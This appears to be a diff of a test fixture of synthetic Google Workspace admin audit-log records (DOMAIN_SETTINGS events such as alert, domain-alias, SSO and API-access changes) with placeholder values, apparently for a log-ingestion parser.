-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert 
name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
